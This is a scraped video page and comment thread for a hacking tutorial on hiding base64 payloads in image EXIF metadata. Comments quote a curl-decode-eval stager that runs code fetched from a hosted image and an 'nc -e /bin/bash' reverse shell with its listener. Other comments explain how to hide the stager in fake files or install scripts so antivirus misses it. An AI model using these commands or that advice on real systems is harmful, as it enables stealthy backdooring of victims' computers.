Тёмный
No video :(

Hide Payloads for MacOS Inside Photo Metadata [Tutorial] 

Null Byte
Подписаться 935 тыс.
Просмотров 107 тыс.
50% 1

How to Conceal Payloads Within Photo Metadata
Full Tutorial: bit.ly/Paylotos
Subscribe to Null Byte: goo.gl/J6wEnH
Kody's Twitter: / kodykinzie
Related video on steganography: • Conceal Secret Message...
Hidden payloads are a common method hackers use to infect a target with malicious or otherwise irregular code. In previous episodes, we've covered how to access photo metadata and how to conceal information by way of steganography. On this episode of Cyber Weapons Lab, we'll take things a step further by showing you how to execute code hidden within an image.
Follow Null Byte on:
Twitter: / nullbytewht
Flipboard: flip.it/3.Gf_0
Weekly newsletter: eepurl.com/dE3Ovb

Опубликовано:

 

17 авг 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 210   
@yegorpl9973
@yegorpl9973 5 лет назад
1:35 HE BLINKED!!!!
@zeallavacube6357
@zeallavacube6357 5 лет назад
HAHAHAHAHAHA most likely hardware malfunction
@yegorpl9973
@yegorpl9973 5 лет назад
@David that's why it looked suspicious to me
@yegorpl9973
@yegorpl9973 5 лет назад
@David no I
@BangBangBang.
@BangBangBang. 5 лет назад
Certain kinds of medication will have this as a side effect.
@mibrahim4245
@mibrahim4245 3 года назад
HAHHAHAHAHAAHAH
@meesha9126
@meesha9126 5 лет назад
FINALLY ! waited for this long time ago well done
@theneighborguy
@theneighborguy 5 лет назад
seems like you're reading my mind dude.... every time something peaks my curiosity, you release a video discussing it.
@zedrobot5864
@zedrobot5864 5 лет назад
Best teacher of cyber security love uuu
@Lortsaf
@Lortsaf 5 лет назад
this is litterly my favorite channel on RU-vid
@demonsgd5520
@demonsgd5520 5 лет назад
Thank you for giving is that holy picture of Peter Kirby
@joseurena7116
@joseurena7116 5 лет назад
Beautiful, no more guessing around how to execute the uploaded payload...I'll be testing to open reverse shells on this, thank you Null Byte 💪
@nicolascaferatta2111
@nicolascaferatta2111 3 года назад
Hey Jose! Could you do it?
@thefenterprises
@thefenterprises 5 лет назад
Please don't stop uploading.
@x.a.k.i5858
@x.a.k.i5858 5 лет назад
Hey null me once again. Love you r content it's helps me soo much thanks 🙏👍
@sreelijo6139
@sreelijo6139 2 года назад
Thanks bro ... I created but what can I do after create it . how can it will work??😬😬
@plusminus20
@plusminus20 5 лет назад
Hey,quick noob question...I'm looking forward to be a hacker,I've completed CCNA and currently reading CCNP.I'm going to get CEH certification next december.My question is what should i learn before getting into CEH and How's the job market for Ethical hacker?
@bobthenob9017
@bobthenob9017 5 лет назад
So the victim would actually have to run the command for it to execute or can the payload be executed via the person just clicking on the image ?
@xugestory
@xugestory 5 лет назад
Clicking the image will not make the payload run. You will need a stager (act as a key) to run the payload. So you either have direct access to the victim machine.
@bobthenob9017
@bobthenob9017 5 лет назад
@@xugestory thank you for the reply :)
@ethicalhackingconsultant4206
@ethicalhackingconsultant4206 3 года назад
​@@xugestory That's what I thought as well but there is another Null Byte article which suggests otherwise. How would this work then or is this incorrect? exiftool -Comment="" pic.jpg This suggests the file can be run via a web browser but this seems wrong to me.
@Martin-ot7xj
@Martin-ot7xj 5 лет назад
hi there , please make a tutorial video for what ports hackers use to attack the computer and we must to close or disable that ports on windows.?
@dasun9719
@dasun9719 3 года назад
Did you make a video for windows payload in photo????sir
@redpilledpatriot6868
@redpilledpatriot6868 4 года назад
The commands I used: printf 'touch ~/Desktop/meta/hacked' | base64 | tr -d ' ', once you hit enter it will generate the base 64 encoded string. apt-get update && apt-get install exiftool -V, the Mac command is brew install exiftool. cd Desktop, changing the directory to my desktop. cd meta, changing the directory to my meta folder. ls, listing the files inside of this particular folder. exiftool Image.jpg, this command lists the EXIF data for the image you select. exiftool -all= Image.jpg, this command strips all of the available metadata that is there on the image you selected. exiftool -Certificate='dG91Y2ggfi9EZXNrdG9wL21ldGEvaGFja2Vk' Image.jpg, this adds the base 64 encoded payload to your image. I didn't get to check out that last command "p=$(curl -s website.com/image.jpg | grep Cert -a | sed 's/]*>//g' | base64 -D);eval $p", the hosting service he used costs $5 a month.
@khue6377
@khue6377 5 лет назад
Keep it coming ! I love the MacOS videos
@MikeTrieu
@MikeTrieu 5 лет назад
Eh, stego can be more than just embedding data in images. You can do it in video or audio or plain text white space. Basically any popular cover traffic. I wouldn't be surprised if SoundCloud began to be a more popular malware vector if Twitter starts cracking down on this technique more.
@mibrahim4245
@mibrahim4245 3 года назад
can this be used with a metasploit reverse tcp backdoor ?
@shadowehv2926
@shadowehv2926 2 года назад
hi i would like to know if you can help me i sell items on a local sales web bage som like googe get very often mesages by scamers i cald the police multiple times but thy dont respond and the way the scamer scams is very commen buy sending a file whit imbeded link to take over your computer i would like to know if i can ad a acact location track inside a image and maby as wel a way to take a picture of the scamer using a hiden payload i am not so good whit programing but have som skils can u help me so i can scare the scamers and maby catch them or confront them or give the info to the local police
@stupidoconiglio
@stupidoconiglio Год назад
Can you show me how to make a rubber ducky on a usb drive
@cardzzz6585
@cardzzz6585 5 лет назад
NULL BYTE!! I LOVE THE MAC TUTORIALS KEEP IT UP!!!
@romeomutonga8056
@romeomutonga8056 3 года назад
Also, try to zoom in so we can see what's going on better
@khornebeserker798
@khornebeserker798 5 лет назад
Hello guys, i have a question aout kali linux, for some resson wehn i want to perl something it tells me that i dont have the HTTP:: request module, and i have no clue waht that means or how i get that running, if you have any help, i would be really happy
@eagleeyeviewimages
@eagleeyeviewimages 3 года назад
I am new to this and the very first deal I copied and pasted comes back command not found... Help
@yuvi_white_hat1942
@yuvi_white_hat1942 5 лет назад
you can't get the reverse connection ???
@prashanthchandrasekar1026
@prashanthchandrasekar1026 Год назад
What is use of this hack. I don't understand. The payload executes in the attacker's system itself.
@shamkarthiks9351
@shamkarthiks9351 5 лет назад
Can we use the same concept for Android and windows
@AjarnSpencer
@AjarnSpencer 2 года назад
u r the King along with Aaron Jones
@floo685
@floo685 5 лет назад
Do you know how to Bypass a BIOS Passwort from a new Notebook model (2017)? I can boot Into my OS (Win10) I find only really old Methods they didnt Work. I can not send it to MSI because I use the notebook daily.
@ewcringeicringeeww4308
@ewcringeicringeeww4308 5 лет назад
Wait... do you blink ?
@yuthish-
@yuthish- 5 лет назад
How to hide a payload for Android And after receiving the image automatically install in Victom mobile
@thehomecook-slavortheflavour
@thehomecook-slavortheflavour 4 года назад
still i'm waiting for a perfect answer to your question ;)
@buddinglearner7085
@buddinglearner7085 4 года назад
me too
@yasaswigrandhi5043
@yasaswigrandhi5043 4 года назад
Steghide
@yanisamsterdame4032
@yanisamsterdame4032 4 года назад
well, we are stilling
@eliaszee670
@eliaszee670 3 года назад
am searching this for a year man
@jenusdy
@jenusdy 5 лет назад
Very good information. Love your content.
@esskayesss69
@esskayesss69 5 лет назад
Why would anyone want to decode the base64 Certificate write that sed expression and try to run an image?
@OliNorwell
@OliNorwell 5 лет назад
It's true - the key takeaway from this video is the method of downloading a base64 string from an image stored on a 'trusted' server that probably won't look suspicious. He didn't demonstrate any method for actually using the technique - other than the ridicolous idea that someone would log in as root then execute the command that he wrote up. An extra couple of minutes explaining some real world uses for this would have been worthwhile.
@leonardusl5141
@leonardusl5141 5 лет назад
@@OliNorwell I think he's trying to demonstrate how if there are computers already infected with the botnet, they'll be polling for these kinds of images and executing it. It's a way to control the botnet without directly revealing yourself (connections to Twitter don't look suspicious).
@esskayesss69
@esskayesss69 5 лет назад
@@leonardusl5141 yeah that's what it is like... It's a tutorial for the NSA 😂😂 I don't own a botnet
@buddinglearner7085
@buddinglearner7085 4 года назад
saruabh isn't the payload will run when the person clicks on the image ro i am getting it completly wrong
@esskayesss69
@esskayesss69 4 года назад
@@buddinglearner7085 no. When you click on the image, the i age viewer application is run. It takes the path to the image and does what it has to do to display it. (I might be wrong here but at least this somehow makes sense to me now😂)
@faisalnaser4525
@faisalnaser4525 Год назад
it will not work, if i but apk trojan in this way, it will not work , why?
@ahwesal4749
@ahwesal4749 5 лет назад
Hi, I have a question ... Is it posseble to locate a phone number ...? I searched a lot but still didn't get anything.
@arthurmaciel9893
@arthurmaciel9893 5 лет назад
I love this channel
@jamesmcdougall8327
@jamesmcdougall8327 5 лет назад
Nullbyte, you should do a series where you go to hotels or anywhere and see how much stuff you can hack that would be a banger series
@DaRealNim
@DaRealNim 5 лет назад
And completely illegal lmao. Why would he film himself doing something illegal and upload it on RU-vid? That's like going into a police station and shouting "I'M A HACKER HAHA I'VE DONE BAD THINGS ARREST ME"
@allistair61
@allistair61 4 года назад
Cool video, this could be interesting for a few practical jokes. And don't worry my hat is a nice light shade of grey.
@kylexyxy1919
@kylexyxy1919 5 лет назад
Love you Man ❤️ 😀 I Appreciate the content !!
@joshuafenton8278
@joshuafenton8278 4 года назад
does this work for iphone?
@robinhood3841
@robinhood3841 3 года назад
So i the victim must download the image + deode it to be able to run the file?
@theinfosecguy
@theinfosecguy 5 лет назад
the payload must run inorder to get reverse tcp connection.if i'm right how to do so?
@xugestory
@xugestory 5 лет назад
If you look at the code he show you about the variable "p". And if you read the code at the end it will run after it get the certificate and decode the base64 payload.
@theinfosecguy
@theinfosecguy 5 лет назад
@@xugestory how to make the target make variable p
@xugestory
@xugestory 5 лет назад
@@theinfosecguy watch the video from the start to the end and listen carefully. Its already there
@Teja-
@Teja- 5 лет назад
​@@xugestory​What he meant is why would the target run the last step after downloading the image. He is looking for a way in which the command should run automatically if the target opens the downloaded image or so.
@xugestory
@xugestory 5 лет назад
@@Teja- target will not be stupid enough to run a code if he don't know what he is doing. So generally you will need physical access to the computer/machine. You can upload the payloaded image to the internet and then make a fake pdf,apk, or any other way that you can inject the "Stager" aka "var p" mentioned in the video. So when they download the pdf file for example the stager will run and it will download,decode and run the payload . Or You can create a rubber ducky, that will run the "Stager". Or If you have a chances to access the target machine, just run the stager yourself. I wont take long enough for the owner to know. Think creatively ! Combine different techniques learned. Hope this will answer the question asked by jibin george
@MrGreenLeaf420
@MrGreenLeaf420 5 лет назад
do a video on a diy Cellebrite UFED Cellphone Forensic Extraction Device.
@rekhasingh5186
@rekhasingh5186 5 лет назад
Hello I m Yash Raj Singh from India I want to know how to get complete knowledge of hacking.
@Lortsaf
@Lortsaf 5 лет назад
just watch every videos on his channel
@rekhasingh5186
@rekhasingh5186 5 лет назад
Fastrol thx but I want basics to each and every things in hacking
@massarata
@massarata 5 лет назад
@Suman Mandal I thank you so much
@xugestory
@xugestory 5 лет назад
Internet is the answer ! Google, forum, twitter, facebook, and hacker community.
@Luca-gb1og
@Luca-gb1og 5 лет назад
Pls make a video about btlejack with the BBC micro:bit
@MuhammadIsmail-in6vf
@MuhammadIsmail-in6vf 4 года назад
why cant we hide payloads for android os in files meta data. Is it possible.
@miakurdi
@miakurdi 2 года назад
Please, I know the name of the book "codes___" Thank you
@amaljohns6417
@amaljohns6417 3 года назад
Is this work without the last code..??
@syedzaidi6528
@syedzaidi6528 4 года назад
you are a super cool man. love you
@Doshvari
@Doshvari 3 года назад
RU-vid is weird place , you can find this video for free and open for every one
@sabayonz
@sabayonz 5 лет назад
Hi there, You! Good morning. :)
@xcutionerkera
@xcutionerkera 5 лет назад
I had something like this on my mind for ages, now i see it's possible and it's fucking amazing
@massarata
@massarata 5 лет назад
I love your channel & thank you for allo your video. Thank you so much.
@tanmay1488
@tanmay1488 5 лет назад
What extensions in chrome are u using ??
@jayrajsinghkushwah1123
@jayrajsinghkushwah1123 4 года назад
Will this work in android phone
@rjaytube9569
@rjaytube9569 5 лет назад
How long does it take to get really good at hacking? I’m a noob. I’ve hacked 5 boxes, but i’ve realized it’s a never ending game. Too much information, new things always updating, and security is getting harder and harder. 🤔
@ChrisTheCringe
@ChrisTheCringe 5 лет назад
You technically answered the question yourself after you hacked your 5 boxes part. You don't get good at it. You learn it. Study the vulnerabilities and find out how to exploit it.
@michaelmyersfan1001
@michaelmyersfan1001 3 года назад
That's what makes hacking fun! Imagine how boring a crossword puzzle would become if you were given the same one every time. Hacking really is just a puzzle. Always trying to figure out how to take advantage of something. Once I've created my own malware, I always want to move on to the next thing and see what else I could do or another route I could take. Only so many times you can keep redoing the same old things you've figured out.
@choutba1725
@choutba1725 5 лет назад
Thank's , it's just another awesome video - Null byte N°1 -
@animebasics2023
@animebasics2023 5 лет назад
how can I use sigploit????? Will you please tell me.....
@HackerboySoubhik
@HackerboySoubhik 3 года назад
How to bind a payload with a image for android hacking??
@leprovocateur7007
@leprovocateur7007 2 года назад
Hi how can I contact you personally?
@lyricals4905
@lyricals4905 5 лет назад
Is this also possible for windows??
@partha4891
@partha4891 3 года назад
Bro does this method work now?
@mrplenty186
@mrplenty186 5 лет назад
Does It Work For Windows.?
@Rick-ms9iq
@Rick-ms9iq 5 лет назад
Cool,bro,you’ve done a good job
@divakarbisht7951
@divakarbisht7951 5 лет назад
Wait..umm We have a 'payload' and an image and we are doing: Image+embedding payload in image metadata So when victim clicks on the final image with metadata embedded on it..will it execute that payload?
@divakarbisht7951
@divakarbisht7951 5 лет назад
it's a post exploitation method I think right?🤔
@DaRealNim
@DaRealNim 5 лет назад
It will not execute the payload when the victim clicks on the image. This is just a way of downloading and executing malicious code. That way, you could write a bash script, send it to someone, and the malicious code that could trigger anti viruses wouldn't be in the script, it would get downloaded and executed in a more stealthy way.
@divakarbisht7951
@divakarbisht7951 5 лет назад
@@DaRealNim Ooh don't you think that the attacker must had setup a listner too? Here in this procedure we created the payload..turned the code into base64 format..and embedded it into an image..but while creating the payload we hasn't setup any listner
@DaRealNim
@DaRealNim 5 лет назад
@@divakarbisht7951 Yes, in this case, there is no listener, because the payload is just "create a file named MyFatBird in this directory". But instead of that, you could make a payload that connects to a listener and give you full access. Example: You encode this in base64 for your payload: "nc -e /bin/bash [LISTENER'S IP] [LISTENER'S PORT]" And on the attacker's machine, you do "nc -lvp [LISTENER'S PORT]" Now if you put your base64 payload in an image, then upload it on the internet, then it's done, you have a great way of backdooring a Linux system. For example, you can write a bash script that download and installs some random legit software, and in the middle of your script, you put the line that download and executes the payload. If someone looks quickly at your code, or if an antivirus analyses it, it'll just look like you're downloading an image on the internet. And that's what you're doing. But in the image is your virus, and that's when it will get executed. So it's a stealthy way of backdooring a computer.
@divakarbisht7951
@divakarbisht7951 5 лет назад
Ooh..🤔 i see...that's great...Thankyou😇
@penh144
@penh144 5 лет назад
Kody Is there any option for bypass python keylogger in windows10? And antivirus
@penh144
@penh144 5 лет назад
Not answering R u know or u r just newbie
@hassaniyan2571
@hassaniyan2571 5 лет назад
Does this photo work in windows system
@leishisomarchang3297
@leishisomarchang3297 3 года назад
I don't understand someone explain
@junuhunuproductions
@junuhunuproductions 5 лет назад
Dayum, I can't see you BLINK!!!!!
@evanwilliam9582
@evanwilliam9582 3 года назад
Can this work on IOS too
@Linuxndroid
@Linuxndroid 5 лет назад
Love you sir your great ❤️
@safsaf2k
@safsaf2k 5 лет назад
Amazing, you're the best
@saurrav3801
@saurrav3801 5 лет назад
Bro pls make a video about android hacking and its vulnarability scanning
@saurrav3801
@saurrav3801 5 лет назад
@Geetha Satheesh geethu......nvr give up.....there is no fulstop...
@kingsung2274
@kingsung2274 5 лет назад
How to hide a payloade in image to hack window OS and android
@kjayasurya97
@kjayasurya97 5 лет назад
can we do this for android?
@massarata
@massarata 5 лет назад
I love your channel
@rangatsharma5778
@rangatsharma5778 3 месяца назад
Mac are good for hacking?
@khennergaming8281
@khennergaming8281 5 лет назад
Whats the intro music?
@SecurityTalent
@SecurityTalent 3 года назад
Thanks
@sharwingarrix2043
@sharwingarrix2043 5 лет назад
How. To. Hide payload in pic for android?
@demonman1234
@demonman1234 5 лет назад
Why not use an APK? Just make it sound convincing and backdoor it. It's fairly easy to backdoor a apk.
@GabrieltTC
@GabrieltTC 5 лет назад
@@demonman1234 que programa recomiendas para hacer estas APK
@sharwingarrix2043
@sharwingarrix2043 5 лет назад
I backdoor the apk with an image but it's not open in android 😔
@vijaychelladurai4986
@vijaychelladurai4986 5 лет назад
how to bind payload on image for android..please! make a video! thank you!
@omarthefoganggang3810
@omarthefoganggang3810 3 года назад
Now i can hide my drug money
@TheClubPlazma
@TheClubPlazma 5 лет назад
Very Nice Thank you Sir
@cemtanca2286
@cemtanca2286 5 лет назад
at 5:37 my fat bird is a joy to see :) hehehee
@baravind719
@baravind719 4 года назад
Bro im unable to upload big payloads
@tomideo.s884
@tomideo.s884 5 лет назад
Why didn’t you choose to be the world richest man? You could if you wanted to😂
@saurrav3801
@saurrav3801 5 лет назад
Bro is this payload work when we open from a pc to hack
@Daddy000
@Daddy000 5 лет назад
👏Nice video
@krisdouglas6536
@krisdouglas6536 3 года назад
Could you email this picture ?
@SergioRibera
@SergioRibera 5 лет назад
Could you make a video of how to hide a payload in photo metadata for android? Please
@panikumarsimhandri7488
@panikumarsimhandri7488 4 года назад
Android Doesn't Connect Back to Metasploit how to fix it i need a help
@NullByteWHT
@NullByteWHT 4 года назад
Does it give you any errors?
@panikumarsimhandri7488
@panikumarsimhandri7488 4 года назад
@@NullByteWHT nothing bro
@herbertderbler1344
@herbertderbler1344 5 лет назад
Seems pretty easy to defeat, and not that sneaky. First of all you have to use specific websites that dont strip off your cert data. then since your always putting it in the same place in the host file, once your compromised, all messages are compromised. wouldn't it be more stealth to mess with the pixel values, and randomize your data locus within the file?
@MikeTrieu
@MikeTrieu 5 лет назад
Maybe not completely random or visual quality will suffer obvious visual and statistical anomalies. You basically have to analyze and follow a similar histogram to the cover image.
@jacobyshaddix1076
@jacobyshaddix1076 3 года назад
Its works for android? :v
@deeprobardhan3411
@deeprobardhan3411 5 лет назад
nice Tshirt!!
@realitynowassigned
@realitynowassigned 3 года назад
It sounded like it hurt when he said the mac and linuc os steps are the same
@worldhello2199
@worldhello2199 5 лет назад
Thanks you )
@vedantparmar2401
@vedantparmar2401 5 лет назад
Plz replay my answer
@harrydamour7564
@harrydamour7564 5 лет назад
My friends 😯🙋‍♂️
@theprotector6099
@theprotector6099 5 лет назад
@Suman Mandal He's a prolific neonazi troll.
@theuniversalkit7249
@theuniversalkit7249 2 года назад
make it in windows
@thebrowserpiratesteam3414
@thebrowserpiratesteam3414 5 лет назад
But can u upload payloads for RAT in images?
@xugestory
@xugestory 5 лет назад
Yes you can upload the payload for RAT or any other payload. But you have to know that the payload will not run just by double clicking the image ( like what we will do to view it). We need something which call stager ( to make it simple, payload embedded in image is like car, and to start a car you need a "key") so stager could be refer to a key to run the car(payload).
@thebrowserpiratesteam3414
@thebrowserpiratesteam3414 5 лет назад
@@xugestory thank you for the clarification, but do you know any youtubr video where i can see this?
@xugestory
@xugestory 5 лет назад
@@thebrowserpiratesteam3414 pay attention to the code he show us about p=$(curl........) ......and so on.. This code probably will download the image from the source ( the image with payload that you uploaded) and then grep the value of the certificate (which is the payload in base64 form) then it will decode the payload in base64 then run the payload. So you can use a rubber ducky if you have direct access to the computer.( Learn how to use rubber Ducky or mousehijacking). Tutorial are easy to find
@thebrowserpiratesteam3414
@thebrowserpiratesteam3414 5 лет назад
@@xugestory ok thank you for the i formation .very helpful
@xugestory
@xugestory 5 лет назад
@@thebrowserpiratesteam3414 youre welcome
Далее
Haunt a Computer Using SSH [Tutorial]
19:10
Просмотров 390 тыс.
Get 10 Mega Boxes OR 60 Starr Drops!!
01:39
Просмотров 14 млн
Use Nmap for Tactical Network Reconnaissance [Tutorial]
17:36
Watch Hackers Deploy Ransomware Through Wi-Fi Hacking
55:03
Simple, Non-Commercial, Open Source Notes
30:25
Просмотров 797 тыс.
Where People Go When They Want to Hack You
34:40
Просмотров 1,5 млн
What Kinds of Files Can Be Viruses?
14:08
Просмотров 254 тыс.
Solving a REAL investigation using OSINT
19:03
Просмотров 156 тыс.
Get 10 Mega Boxes OR 60 Starr Drops!!
01:39
Просмотров 14 млн